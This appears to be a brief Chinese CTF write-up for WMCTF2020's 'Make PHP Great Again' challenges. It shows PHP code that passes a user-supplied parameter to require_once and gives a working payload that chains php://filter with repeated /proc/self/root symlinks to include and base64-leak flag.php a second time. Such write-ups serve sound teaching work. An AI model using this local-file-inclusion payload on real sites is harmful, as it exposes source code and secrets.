[WMCTF2020]Make PHP Great Again 2.0&[WMCTF2020]Make PHP Great Again

源码

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

知识点

php源码分析 require_once 绕过不能重复包含文件的限制

解题步骤

根据上面的文章，进行重复包含文件
payload：
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

/proc/self指向当前进程的/proc/pid/，/proc/self/root/是指向/的符号链接